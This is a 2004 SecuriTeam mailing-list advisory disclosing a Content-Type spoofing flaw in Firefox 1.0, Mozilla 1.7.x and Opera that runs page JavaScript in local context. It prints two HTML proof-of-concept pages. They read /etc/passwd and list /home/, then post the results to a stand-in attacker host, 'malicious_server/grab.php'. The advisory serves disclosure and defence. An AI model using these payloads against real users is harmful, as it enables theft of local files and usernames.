Date: 16 Dec 2004 14:50:52 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]Subject: [NEWS] Content-Type Spoofing in Mozilla Firefox and Opera Allows Users to Bypass Security Restrictions
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Content-Type Spoofing in Mozilla Firefox and Opera Allows Users to Bypass
Security Restrictions
------------------------------------------------------------------------
SUMMARY
A problem exists in some browsers where it is possible by a Content-Type
spoofing to "force" the target user to open a page and bypass the security
zone and execute JavaScript in local context.
DETAILS
Browsers tested:
* Firefox version 1.0
* Mozilla version 1.7.x
* Opera version 7.54 (*)
* Konqueror version 3.3.1
* Epiphany
* Internet Explorer version 6 with SP1
* Internet Explorer version 6 with SP1 + SP2
Browsers affected:
* Firefox version 1.0
* Mozilla version 1.7.x
* Opera version 7.51 up to version 7.54 (inclusive)
When the user "victim" visits http://malicious_server/paage.html, if
malicious_server responds with a page containing an unknown Content-Type
field (for example text/html., note the dot at the end of the file), the
browser will show a dialog window with some options (open, save, cancel).
Choosing "Open" to view this page, it will be downloaded and opened in
local ; JavaScript code will be executed in local context. Obviously, if
the user chooses to save and open it after the result is equal.
Giovanni tested this with some browsers but it seems that only Mozilla
Firefox and Opera(*) are exploitable in this mode.
(*) For Opera, this method of exploitation requires that opera must be set
as Default Application in "handler for saved files" in case the user
chooses "Open" in the dialog window.
Impact:
It could allow remote users to:
* Obtain the content of /home/ directory ( or c:\Documents and Settings\
for windows systems ) and therefore gather a set of usernames present on
the target system
* Know if a particular program is installed on the target system for a
successive attack
* Read the content of confidential files
* Read the browser's cache
In opera it is located in ~/.opera/cache4, instead in Mozilla Firefox it's
in /.mozilla/firefox/$RANDOM-STRING.default/Cache. Since it is possible to
enumerate the directory structure , a malicious user could easily know the
path to firefox's cache.
Proof of concept:
The following PoCs are exploit the Linux version of Firefox and Opera, but
they can be also applied to Windows versions. In order to test
Content-Type spoofing Giovanni has modified an open source web server to
make it respond with a spoofed Content-Type.
Read a local file utilizing inner.HTML method:
< HTML>
< BODY onLoad="ReadFileContent()" >
< iframe name="local_file" src="file:///etc/passwd" height=0
width=0></iframe>
< form name="module" method="post"
action="http://malicious_server/grab.php" ENCTYPE="text/plain">
< input name="content" type="hidden" size="300" >
</form>
< script>
function ReadFileContent(){
alert(local_file.document.all(0).innerHTML);
document.module.content.value+=local_file.document.firstChild.innerHTML;
//send content to malicious_server
document.module.submit();
}
</script>
</body>
</html>
(*) works with Firefox, with Opera it works only if a file has a .htm or
HTML extension.
List the directory structure:
< html>
< body onLoad="
for(i=0;i<local_files.document.links.length;i++)
{document.module.content.value+=local_files.document.links.item(i);}
alert(document.module.content.value);
//send list_files at malicious_server
document.module.submit();
">
< form name="module" method="post"
action="http://malicious_server/grab.php" ENCTYPE="text/plain">
< input name="content" type="hidden" size="300" >
</form>
< iframe name="local_files" src="file:///home/" height=0 width=0></iframe>
</body>
</html>
Vendor status:
24th November 2004: Giovanni has contacted mozilla by [email protected]
and Opera by its bug track page at <https://bugs.opera.com/wizard/>
https://bugs.opera.com/wizard/.
Response from Mozilla
<https://bugzilla.mozilla.org/show_bug.cgi?id=273419>
https://bugzilla.mozilla.org/show_bug.cgi?id=273419:
"The problem is that Mozila utilizes the mime-type for served HTTP
documents but it does use the extension for opening local files. To
workaround this, you should disable the "open with" option. This would
move the "who is to blame" around to the user because he has to go through
the OS Filemanager to open it."
ADDITIONAL INFORMATION
The information has been provided by <mailto:badpenguin@zone-h.org.>
Giovanni Delvecchio.
The original article can be found at:
<http://www.zone-h.org/en/advisories/read/id=6502/>;
http://www.zone-h.org/en/advisories/read/id=6502/
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
